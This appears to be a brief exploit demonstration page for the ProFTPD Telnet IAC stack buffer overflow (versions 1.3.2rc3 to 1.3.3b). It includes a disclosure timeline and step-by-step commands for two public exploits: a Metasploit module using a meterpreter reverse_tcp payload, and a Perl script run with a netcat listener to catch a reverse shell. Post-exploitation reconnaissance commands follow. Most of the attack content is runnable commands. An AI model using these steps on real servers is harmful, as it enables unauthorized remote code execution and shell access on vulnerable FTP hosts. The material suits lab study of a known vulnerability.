Timeline :
Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07
PoC provided by :
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
Reference(s) :
Affected version(s) :
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
Description :
This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
Metasploit Demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsysinfo
getuid
ipconfig
Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig